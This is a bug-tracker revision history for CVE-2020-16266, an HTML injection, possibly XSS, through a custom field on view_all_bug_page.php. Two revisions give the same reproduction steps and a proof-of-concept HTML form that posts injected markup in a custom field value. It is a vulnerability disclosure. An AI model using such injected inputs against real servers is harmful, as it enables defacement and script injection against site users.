View Revisions: Issue #27056

Summary 0027056: CVE-2020-16266: HTML injection (maybe XSS) via custom field on view_all_bug_page.php
Revision 2020-06-22 07:17 by dregad
Steps To Reproduce
  1. Create a custom string type field.
  2. Create a form that sends HTML code in the custom field 1 value (see poc).

poc:
<form action="https://[hostname]/view_all_set.php?f=3&quot; method="POST">
<input name="custom_field_1[]" value="<h1 style=color:red>INJECTION</h1>">
<input type=submit>
</form>

Revision 2020-06-21 02:29 by hanno
Steps To Reproduce
  1. Create a custom string type field.
  2. Create a form that sends HTML code in the custom field 1 value (see poc).

poc:
<form action="https://[hostname]/view_all_set.php?f=3&quot; method="POST">
<input name="custom_field_1[]" value="<h1 style=color:red>INJECTION</h1>">
<input type=submit>
</form>